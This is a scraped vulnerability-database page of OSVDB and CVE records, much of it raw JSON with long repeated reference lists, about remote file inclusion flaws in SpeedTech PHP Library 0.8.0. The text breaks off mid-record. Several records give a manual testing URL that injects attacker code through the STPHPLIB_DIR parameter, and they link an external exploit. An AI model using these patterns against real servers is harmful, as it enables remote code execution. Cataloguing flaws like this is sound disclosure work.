Search...

SpeedTech PHP Library stphplocale.php STPHPLIB_DIR Variable Remote File Inclusion

2007-09-03T00:00:00

ID OSVDB:39088
Type osvdb
Reporter OSVDB
Modified 2007-09-03T00:00:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

References:

JSON Vulners Source

Initial Source

{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39073](https://vulners.com/osvdb/OSVDB:39073)\n[Related OSVDB ID: 39074](https://vulners.com/osvdb/OSVDB:39074)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:39088", "modified": "2007-09-03T00:00:00", "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-04-28T13:20:35", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4738"]}, {"type": "osvdb", "idList": ["OSVDB:39076", "OSVDB:39099", "OSVDB:39096", "OSVDB:39103", "OSVDB:39073", "OSVDB:39098", "OSVDB:39078", "OSVDB:39105", "OSVDB:39089", "OSVDB:39104"]}, {"type": "exploitdb", "idList": ["EDB-ID:4358"]}], "modified": "2017-04-28T13:20:35", "rev": 2}, "vulnersScore": 6.1}, "id": "OSVDB:39088", "title": "SpeedTech PHP Library stphplocale.php STPHPLIB_DIR Variable Remote File Inclusion", "edition": 1, "published": "2007-09-03T00:00:00", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2007-4738"], "lastseen": "2017-04-28T13:20:35"}

{"cve": [{"lastseen": "2020-10-03T11:45:53", "description": "Multiple PHP remote file inclusion vulnerabilities in SpeedTech PHP Library (STPHPLibrary) 0.8.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) db_conf or (2) ADODB_DIR parameter to utils/stphpimage_show.php; or a URL in the STPHPLIB_DIR parameter to (3) stphpbutton.php, (4) stphpcheckbox.php, (5) stphpcheckboxwithcaption.php, (6) stphpcheckgroup.php, (7) stphpcomponent.php, (8) stphpcontrolwithcaption.php, (9) stphpedit.php, (10) stphpeditwithcaption.php, (11) stphphr.php, (12) stphpimage.php, (13) stphpimagewithcaption.php, (14) stphplabel.php, (15) stphplistbox.php, (16) stphplistboxwithcaption.php, (17) stphplocale.php, (18) stphppanel.php, (19) stphpradiobutton.php, (20) stphpradiobuttonwithcaption.php, (21) stphpradiogroup.php, (22) stphprichbutton.php, (23) stphpspacer.php, (24) stphptable.php, (25) stphptablecell.php, (26) stphptablerow.php, (27) stphptabpanel.php, (28) stphptabtitle.php, (29) stphptextarea.php, (30) stphptextareawithcaption.php, (31) stphptoolbar.php, (32) stphpwindow.php, (33) stphpxmldoc.php, or (34) stphpxmlelement.php, a different set of vectors than CVE-2007-4737. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.", "edition": 3, "cvss3": {}, "published": "2007-09-06T19:17:00", "title": "CVE-2007-4738", "type": "cve", "cwe": ["CWE-94", "CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2007-4738"], "modified": "2017-07-29T01:33:00", "cpe": ["cpe:/a:speedtech:stphplibrary:0.8.0"], "id": "CVE-2007-4738", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4738", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:speedtech:stphplibrary:0.8.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Vulnerability Description\nSpeedtech STPHPLib contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'stphpcheckbox.php' not properly sanitizing user input supplied to the 'STPHPLIB_DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSpeedTech STPHPLib version 0.8.0 stphpcheckbox.php STPHPLIB_DIR variable remote file inclusion.\n\n## Manual Testing Notes\nhttp://[victim]/[stphplib_path]/stphpcheckbox.php?STPHPLIB_DIR=[CODE]\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39073](https://vulners.com/osvdb/OSVDB:39073)\n[Related OSVDB ID: 39074](https://vulners.com/osvdb/OSVDB:39074)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\nGeneric Exploit URL: http://milw0rm.com/exploits/4358\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\nBugtraq ID: 25525\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39075", "id": "OSVDB:39075", "title": "SpeedTech PHP Library stphpcheckbox.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39073](https://vulners.com/osvdb/OSVDB:39073)\n[Related OSVDB ID: 39074](https://vulners.com/osvdb/OSVDB:39074)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39077", "id": "OSVDB:39077", "title": "SpeedTech PHP Library stphpcheckgroup.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Vulnerability Description\nSpeedtech STPHPLib contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'stphpedit.php' not properly sanitizing user input supplied to the 'STPHPLIB_DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSpeedTech STPHPLib version 0.8.0 stphpedit.php STPHPLIB_DIR variable remote file inclusion.\n\n## Manual Testing Notes\nhttp://[victim]/[stphplib_path]/stphpedit.php?STPHPLIB_DIR=[CODE]\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39073](https://vulners.com/osvdb/OSVDB:39073)\n[Related OSVDB ID: 39074](https://vulners.com/osvdb/OSVDB:39074)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\nGeneric Exploit URL: http://milw0rm.com/exploits/4358\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\nBugtraq ID: 25525\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39080", "id": "OSVDB:39080", "title": "SpeedTech PHP Library stphpedit.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39073](https://vulners.com/osvdb/OSVDB:39073)\n[Related OSVDB ID: 39074](https://vulners.com/osvdb/OSVDB:39074)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39081", "id": "OSVDB:39081", "title": "SpeedTech PHP Library stphpeditwithcaption.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Vulnerability Description\nSpeedtech STPHPLib contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'stphphr.php' not properly sanitizing user input supplied to the 'STPHPLIB_DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSpeedTech STPHPLib version 0.8.0 stphphr.php STPHPLIB_DIR variable remote file inclusion.\n\n## Manual Testing Notes\nhttp://[victim]/[stphplib_path]/stphphr.php?STPHPLIB_DIR=[CODE]\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39073](https://vulners.com/osvdb/OSVDB:39073)\n[Related OSVDB ID: 39074](https://vulners.com/osvdb/OSVDB:39074)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39085](https://vulners.com/osvdb/OSVDB:39085)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\nGeneric Exploit URL: http://milw0rm.com/exploits/4358\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\nBugtraq ID: 25525\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39082", "id": "OSVDB:39082", "title": "SpeedTech PHP Library stphphr.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "cvelist": ["CVE-2007-4738"], "description": "## Vulnerability Description\nSpeedtech STPHPLib contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'stphplabel.php' not properly sanitizing user input supplied to the 'STPHPLIB_DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSpeedTech STPHPLib version 0.8.0 stphplabel.php STPHPLIB_DIR variable remote file inclusion.\n\n## Manual Testing Notes\nhttp://[victim]/[stphplib_path]/stphplabel.php?STPHPLIB_DIR=[CODE]\n\n## References:\nVendor URL: http://stphplib.sourceforge.net/\n[Secunia Advisory ID:26658](https://secuniaresearch.flexerasoftware.com/advisories/26658/)\n[Related OSVDB ID: 39077](https://vulners.com/osvdb/OSVDB:39077)\n[Related OSVDB ID: 39084](https://vulners.com/osvdb/OSVDB:39084)\n[Related OSVDB ID: 39086](https://vulners.com/osvdb/OSVDB:39086)\n[Related OSVDB ID: 39087](https://vulners.com/osvdb/OSVDB:39087)\n[Related OSVDB ID: 39090](https://vulners.com/osvdb/OSVDB:39090)\n[Related OSVDB ID: 39091](https://vulners.com/osvdb/OSVDB:39091)\n[Related OSVDB ID: 39093](https://vulners.com/osvdb/OSVDB:39093)\n[Related OSVDB ID: 39098](https://vulners.com/osvdb/OSVDB:39098)\n[Related OSVDB ID: 39099](https://vulners.com/osvdb/OSVDB:39099)\n[Related OSVDB ID: 39103](https://vulners.com/osvdb/OSVDB:39103)\n[Related OSVDB ID: 39073](https://vulners.com/osvdb/OSVDB:39073)\n[Related OSVDB ID: 39074](https://vulners.com/osvdb/OSVDB:39074)\n[Related OSVDB ID: 39078](https://vulners.com/osvdb/OSVDB:39078)\n[Related OSVDB ID: 39088](https://vulners.com/osvdb/OSVDB:39088)\n[Related OSVDB ID: 39094](https://vulners.com/osvdb/OSVDB:39094)\n[Related OSVDB ID: 39096](https://vulners.com/osvdb/OSVDB:39096)\n[Related OSVDB ID: 39076](https://vulners.com/osvdb/OSVDB:39076)\n[Related OSVDB ID: 39080](https://vulners.com/osvdb/OSVDB:39080)\n[Related OSVDB ID: 39083](https://vulners.com/osvdb/OSVDB:39083)\n[Related OSVDB ID: 39092](https://vulners.com/osvdb/OSVDB:39092)\n[Related OSVDB ID: 39097](https://vulners.com/osvdb/OSVDB:39097)\n[Related OSVDB ID: 39100](https://vulners.com/osvdb/OSVDB:39100)\n[Related OSVDB ID: 39102](https://vulners.com/osvdb/OSVDB:39102)\n[Related OSVDB ID: 39075](https://vulners.com/osvdb/OSVDB:39075)\n[Related OSVDB ID: 39079](https://vulners.com/osvdb/OSVDB:39079)\n[Related OSVDB ID: 39081](https://vulners.com/osvdb/OSVDB:39081)\n[Related OSVDB ID: 39082](https://vulners.com/osvdb/OSVDB:39082)\n[Related OSVDB ID: 39089](https://vulners.com/osvdb/OSVDB:39089)\n[Related OSVDB ID: 39095](https://vulners.com/osvdb/OSVDB:39095)\n[Related OSVDB ID: 39101](https://vulners.com/osvdb/OSVDB:39101)\n[Related OSVDB ID: 39104](https://vulners.com/osvdb/OSVDB:39104)\n[Related OSVDB ID: 39105](https://vulners.com/osvdb/OSVDB:39105)\nISS X-Force ID: 36417\nGeneric Exploit URL: http://milw0rm.com/exploits/4358\n[CVE-2007-4738](https://vulners.com/cve/CVE-2007-4738)\nBugtraq ID: 25525\n", "edition": 1, "modified": "2007-09-03T00:00:00", "published": "2007-09-03T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39085", "id": "OSVDB:39085", "title": "SpeedTech PHP Library stphplabel.php STPHPLIB_DIR Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": 